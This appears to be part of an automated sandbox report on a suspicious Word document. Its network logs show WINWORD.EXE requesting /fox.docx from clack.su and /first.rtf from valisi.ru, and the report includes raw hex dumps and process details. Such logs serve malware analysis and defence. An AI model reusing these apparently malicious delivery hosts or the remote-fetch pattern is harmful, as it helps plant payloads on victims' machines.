        Apr 19, 2025 02:44:42.439194918 CEST | 1358 | IN | Data Raw: 8b a6 4d 44 5d 60 c2 bc 8c 5b 36 99 c9 d9 22 71 ef 54 92 7b 65 7b 68 b8 dd 82 2d 32 43 80 71 7f 54 1d a4 3f 43 f7 ea 9b 6b d4 fc 43 6e f6 2f 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 da cc b4 e2 53 02 00 00 1e 0a 00 00 11 00 00 00 77 6f 72 64 2f
        Data Ascii: MD]`[6"qT{e{h-2CqT?CkCn/PK!Sword/endnotes.xml0@.AIfhU3xI&$o-C]tcH#3+AGT\7yTIAgfu1K!mkAt&N*qSVI)21/Q
        Apr 19, 2025 02:44:42.439208031 CEST | 1358 | IN | Data Raw: 5f ef 46 5c d1 54 0f bc 9a 12 93 da 76 70 ac c4 39 7f 66 b3 6a 7d ae 8b e1 24 dc d5 87 93 7e 27 ee 0f 93 c3 fa c2 b7 ea c3 7b 91 13 eb 1b 8d d1 8f 3b 6d 53 4e 5f f1 3e 74 2a d7 0e 92 a3 9b 5d 4f e2 1d de 77 30 f6 37 3b be e9 77 86 5f 86 15 ef 87
        Data Ascii: _F\Tvp9fj}$~'{;mSN_>t*]Ow07;w_mM7ML>0WPK!iQ,word/footer1.xml]O0'?XN E-iht8MCRi?~GJ>~G5&b2r}
        Apr 19, 2025 02:44:42.439218044 CEST | 1358 | IN | Data Raw: b7 d7 51 cf ed f2 da f1 b4 a8 52 79 02 f6 b1 5f e7 5f f0 ca f9 db c4 28 ec b1 22 1e d1 2a fa 58 78 3e 67 e3 44 40 15 9e 26 1e 94 9a 9f 92 1b f5 3c 40 1a c0 a8 03 88 69 d1 b3 a4 1b 46 5c 33 30 28 7f e2 58 76 1e 66 d2 60 ec 51 9c b6 fa 5e 6f ce c3
        Data Ascii: QRy__("*Xx>gD@&<@iF\30(Xvf`Q^oD+~&O'3,@h8M>m2#!e@z"4'pHAd9W-w~$ZJ2;r%;RbnqYS4rqD~lJ0oZ
        Apr 19, 2025 02:44:42.439229012 CEST | 1358 | IN | Data Raw: 8b e3 31 c8 9f 00 82 1d fa de 18 35 bf 18 15 62 ab 6a 04 ba 99 04 02 55 23 52 30 8d f4 1f 9b 0b a7 91 fc 31 29 9a 46 9a 8f 49 f1 34 d2 28 9d ea 71 82 0b c9 38 0c 6e 84 aa 89 81 a6 da e2 9a a8 e7 9d 9c 01 58 12 53 7e 2e ab d2 bc 00 d3 0d 7b 0c 29
        Data Ascii: 15bjU#R01)FI4(q8nXS~.{)E`5y~1!Y5{HNVzwBd%f4;UuQSi0X6~Azg+O'9;UD=#"1X#$|\ )3+fa_Q?eo
        Apr 19, 2025 02:44:42.439239979 CEST | 1358 | IN | Data Raw: 4c 43 59 8b 1d 3b db 9c 6c 74 66 da 57 b3 a8 f5 64 23 dd 9b 85 f3 60 ee ba f3 66 fb b2 04 62 2e 4a 70 4a dd ce 88 21 cb 82 5b 51 60 01 0b 6d 8a e3 07 22 a5 15 99 a0 26 fc 5c bb c9 d5 ef ab 06 68 7d 26 5b d6 16 0b 66 88 65 63 2a 14 9b 40 26 48 a6
        Data Ascii: LCY;ltfWd#`fb.JpJ![Q`m"&\h}&[fec*@&HL1)wlJdjk]{:<AT@SvOvoXuJ?a2&w~LnI4n'{sqMC*hEPWGU~ YhO_6\6'\PKA
        Apr 19, 2025 02:44:42.439245939 CEST | 1358 | IN | Data Raw: bc 56 b2 8f 84 69 b2 fb ea 4d d6 3e b2 28 33 09 ed c8 76 9f d1 5b 51 5f 55 d9 e8 72 d9 a9 01 76 97 b8 8f 32 a7 d9 e5 99 53 64 b7 59 bb 56 2a 3a 30 f9 8a 2e 31 14 b1 2c 64 93 c9 6f f7 51 ea ad a4 c7 37 88 7a 43 97 b8 af 7a 44 a3 d5 e0 b2 bb 3c bd
        Data Ascii: ViM>(3v[Q_Urv2SdYV*:0.1,doQ7zCzD<0(.rR]y 5|pA#7WGgjd6]w'uJwk[5u47@h6/PC"`u ;>[/:9&2s
        Apr 19, 2025 02:44:42.439256907 CEST | 1358 | IN | Data Raw: 48 48 08 07 09 09 e1 20 21 21 1c 24 24 84 83 84 84 70 90 90 10 0e 12 12 c2 41 42 42 38 48 48 08 07 09 09 e1 20 21 21 1c 24 24 84 83 84 84 70 90 90 10 0e 12 12 c2 41 42 42 38 48 48 f8 ff 0f c2 ed 79 f5 94 74 5a f2 c4 6d e2 82 fc ce 4f 79 93 8d 06
        Data Ascii: HH !!$$pABB8HH !!$$pABB8HHytZmOy2ce)zKWQisNSXg8LfzK"AnvEHB+, (%H'R@mqX(oSK@V f;l
        Apr 19, 2025 02:44:42.811322927 CEST | 1358 | IN | Data Raw: 6d 44 5a 55 da bc b4 67 d2 2e a5 73 d2 b5 e9 cd e9 9b d3 cf a4 df ce c8 cc 98 94 b1 34 e3 58 c6 e7 99 09 99 c6 cc 39 99 cf 64 7e 3c 32 72 64 c1 c8 59 23 f7 8e 7c 6f 14 73 94 76 54 cb a8 27 47 bd 93 85 67 a9 b2 9a b3 b6 67 bd 3d 1a 1f ad 1e 6d 1b
        Data Ascii: mDZUg.s4X9d~<2rdY#|osvT'Ggg=msD'qJJ.f[S(X4TZJf}DcEq[y,.O(S,PF9ZI*w*?PTU5jMffV]^_kL1|K'3
        Apr 19, 2025 02:44:42.857609987 CEST | 293 | OUT | HEAD /fox.docx HTTP/1.1
        Authorization: Bearer
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        X-IDCRL_ACCEPTED: t
        User-Agent: Microsoft Office Existence Discovery
        Host: clack.su
        Connection: Keep-Alive
        Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
        Apr 19, 2025 02:44:43.229506969 CEST | 352 | IN | HTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
        last-modified: Wed, 19 Mar 2025 11:29:09 GMT
        etag: "6eac-67daaa85-b8348916368e5d6e;;;"
        accept-ranges: bytes
        content-length: 28332
        date: Sat, 19 Apr 2025 00:44:43 GMT
        server: LiteSpeed


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        4 | 192.168.2.4 | 49730 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Timestamp | Bytes transferred | Direction | Data
        Apr 19, 2025 02:44:43.620726109 CEST | 322 | OUT | OPTIONS / HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-MSGETWEBURL: t
        X-IDCRL_ACCEPTED: t
        Host: valisi.ru
        Apr 19, 2025 02:44:44.100126982 CEST | 1358 | IN | HTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=c23817273c64555c130cc0150a4922ad; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_1026485859=6802f1fbe39a9; expires=Sat, 19-Apr-2025 01:14:43 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:43 GMT
        server: LiteSpeed
        Data Raw: 32 30 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 30 30 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 61 6e 63 65 64 20 73 74 75 64 69 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 46 69 6c 6d 74 65 63 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 20 2f 3e 0a 09 0a 09 3c 21 2d 2d 20 63 73 73 20 2d 2d 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 76 61 6c 69 73 69 2e 72 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f [TRUNCATED]
        Data Ascii: 20de<!DOCTYPE html><html lang="ru"><head><meta charset="UTF-8"><meta name="viewport" content="width=1100"><meta name="author" content="Advanced studio"><title>Filmtec</title><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />... css --><link rel="shortcut icon" href="http://valisi.ru/wp-content/themes/filtrest/favicon.ico"><link href='https://fonts.googleapis.com/css?family=Fira+Sans:400,300,500,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><link rel="stylesheet" href="http://valisi.ru/wp-content/themes/filtrest/jquery.fancybox.css" media="screen"><link rel="stylesheet" href="http://valisi.ru/wp-content/themes/filtrest/style.css?3" media="screen">...[if lt IE 9]> <script src="http://html5shiv
        Apr 19, 2025 02:44:44.100192070 CEST | 1358 | IN | Data Raw: 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 65 37 2d 6a 73 2e 67 6f 6f 67 6c 65
        Data Ascii: .googlecode.com/svn/trunk/html5.js"></script> <script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script> <![endif]--><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/i
        Apr 19, 2025 02:44:44.100279093 CEST | 1358 | IN | Data Raw: 21 3d 3d 72 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 31 36 2c 31 36 2c 31 2c 31 29 2e 64 61 74 61 5b 30 5d 7d 72 65 74 75 72 6e 21 31 7d 28 72 5b 6e 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f
        Data Ascii: !==r.getImageData(16,16,1,1).data[0]}return!1}(r[n]),t.supports.everything=t.supports.everything&&t.supports[r[n]],"flag"!==r[n]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[r[n]]);t.supports.everythingExceptFl
        Apr 19, 2025 02:44:44.100291967 CEST | 1358 | IN | Data Raw: 73 2f 77 70 2d 73 68 6f 70 2d 6f 72 69 67 69 6e 61 6c 2f 77 70 2d 73 68 6f 70 2e 63 73 73 3f 76 65 72 3d 31 39 38 61 35 37 32 66 30 32 30 34 34 61 34 36 34 61 33 35 34 37 66 66 37 35 36 35 34 36 30 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73
        Data Ascii: s/wp-shop-original/wp-shop.css?ver=198a572f02044a464a3547ff75654602' type='text/css' media='all' /><link rel='stylesheet' id='wp-shop_style-css' href='http://valisi.ru/wp-content/plugins/wp-shop-original/styles/default.css?ver=198a572f02044a
        Apr 19, 2025 02:44:44.100311995 CEST | 1358 | IN | Data Raw: 5c 75 30 34 34 63 5c 75 30 34 33 37 5c 75 30 34 33 65 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 38 20 5c 75 30 34 33 66 5c 75 30 34 34 30 5c 75 30 34 33 65 5c 75 30 34 33 63 5c 75 30 34 33 65 5c 75 30 34 33 61 5c 75 30
        Data Ascii: \u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u043e\u043c\u043e\u043a\u043e\u0434: ","show_panel":"0","yandex":"","promocode":"0","cartpage":"http:\/\/valisi.ru\/cart\/","order":"\u041e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u043
        Apr 19, 2025 02:44:44.100327015 CEST | 1358 | IN | Data Raw: 6e 5f 6c 69 6e 6b 22 3a 22 23 22 2c 22 63 6f 6e 74 5f 73 68 6f 70 22 3a 22 5c 75 30 34 31 66 5c 75 30 34 34 30 5c 75 30 34 33 65 5c 75 30 34 33 34 5c 75 30 34 33 65 5c 75 30 34 33 62 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 32 5c 75 30
        Data Ascii: n_link":"#","cont_shop":"\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u044c \u043f\u043e\u043a\u0443\u043f\u043a\u0438","is_empty":"\u0412\u0430\u0448\u0430 \u043a\u043e\u0440\u0437\u0438\u043d\u0430 \u043f\u0443\u0441\u0442\u0430.",
        Apr 19, 2025 02:44:44.100351095 CEST | 861 | IN | Data Raw: 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 76 74 2c 20 68 61 6e 64 6c 65 72 2c 20 66 61 6c 73 65 29 3b 0a 09 09 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 6f 77 2e 64 65 74 61 63 68 45 76 65 6e 74 29 20 7b
        Data Ascii: ument.removeEventListener(evt, handler, false);} else if (window.detachEvent) {document.detachEvent('on' + evt, handler);}};var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypres
        Apr 19, 2025 02:44:44.199604988 CEST | 1358 | IN | Data Raw: 32 30 63 38 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 76 61 72 20 5f 5f 63 61 72 74 20 3d 20 30 3b 0a 09 76 61 72 20 5f 5f 77 20 3d 20 30 3b 0a 0a 09 43 55 52 52 20 3d 20 22 45 55 52
        Data Ascii: 20c8<script type="text/javascript">var __cart = 0;var __w = 0;CURR = "EUR";jQuery(document).ready(function(){if (window.Cart !== undefined){window.__cart = new window.Cart("wpshop_minicart", "wpshop_cart");}if (w
        Apr 19, 2025 02:44:44.199687004 CEST | 1358 | IN | Data Raw: 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 36 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 76 61 6c 69 73 69 2e 72 75 2f 22 3e d0 93 d0 bb d0 b0 d0 b2 d0
        Data Ascii: rrent_page_item menu-item-home menu-item-62"><a href="http://valisi.ru/"></a></li><li id="menu-item-67" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-67"><a href="http://valisi.ru/about/">
        Apr 19, 2025 02:44:44.225159883 CEST | 1358 | IN | Data Raw: 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 35 2f 70 72 69 63 65 5f 68 79 64 72 6f 74 65 63 68 5f 32 30 31 35 2e 70 64 66 22 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 6c 69 6e 6b 22 3e d0 9f d1 80 d0 b0 d0 b9 d1 81 2d d0 bb d0
        Data Ascii: ontent/uploads/2016/05/price_hydrotech_2015.pdf" class="slide-link">-</a></div> ... /slider --><div class="content"><ul class="cat maincat"><li><a href="http://valisi.ru/obezzhelezivanie/" class="cat-img"><img src
        Apr 19, 2025 02:44:44.331327915 CEST | 1358 | IN | Data Raw: 61 74 2d 74 69 74 6c 65 22 3e d0 9e d0 b1 d0 b5 d1 81 d1 81 d0 be d0 bb d0 b8 d0 b2 d0 b0 d0 bd d0 b8 d0 b5 3c 2f 61 3e 0a 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 63 61 74 2d 73 75 62 6d 65 6e 75 22 3e 0a 09 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 3c
        Data Ascii: at-title"></a><ul class="cat-submenu"></ul><li><a href="http://valisi.ru/reagenty/" class="cat-img"><img src="http://valisi.ru/wp-content/uploads/2016/05/reagenty-e14119751904911.png" alt="


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        5 | 192.168.2.4 | 49731 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Timestamp | Bytes transferred | Direction | Data
        Apr 19, 2025 02:44:44.489150047 CEST | 225 | OUT | OPTIONS / HTTP/1.1
        Authorization: Bearer
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        X-IDCRL_ACCEPTED: t
        User-Agent: Microsoft Office Protocol Discovery
        Host: valisi.ru
        Content-Length: 0
        Connection: Keep-Alive
        Apr 19, 2025 02:44:45.155724049 CEST | 1358 | IN | HTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_1026485859=6802f1fcf250d; expires=Sat, 19-Apr-2025 01:14:44 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:45 GMT
        server: LiteSpeed


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        6 | 192.168.2.4 | 49734 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Timestamp | Bytes transferred | Direction | Data
        Apr 19, 2025 02:44:45.547377110 CEST | 468 | OUT | HEAD /first.rtf HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-IDCRL_ACCEPTED: t
        Host: valisi.ru
        Cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d; wfvt_1026485859=6802f1fbe39a9; PHPSESSID=c23817273c64555c130cc0150a4922ad
        Apr 19, 2025 02:44:46.295002937 CEST | 476 | IN | HTTP/1.1 404 Not Found
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: wfvt_1026485859=6802f1fe1a5cc; expires=Sat, 19-Apr-2025 01:14:46 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        cache-control: no-cache, must-revalidate, max-age=0
        pragma: no-cache
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        date: Sat, 19 Apr 2025 00:44:46 GMT
        server: LiteSpeed


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        7 | 192.168.2.4 | 49735 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Timestamp | Bytes transferred | Direction | Data
        Apr 19, 2025 02:44:46.680639982 CEST | 258 | OUT | GET /first.rtf HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
        Accept-Encoding: gzip, deflate
        Host: valisi.ru
        Connection: Keep-Alive
        Cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
        Apr 19, 2025 02:44:47.339966059 CEST | 1358 | IN | HTTP/1.1 404 Not Found
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: wfvt_1026485859=6802f1ff2de53; expires=Sat, 19-Apr-2025 01:14:47 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        cache-control: no-cache, must-revalidate, max-age=0
        pragma: no-cache
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        content-encoding: gzip
        vary: Accept-Encoding
        date: Sat, 19 Apr 2025 00:44:47 GMT
        server: LiteSpeed



        Target ID:0
        Start time:20:44:31
        Start date:18/04/2025
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x7f0000
        File size:1'620'872 bytes
        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        No disassembly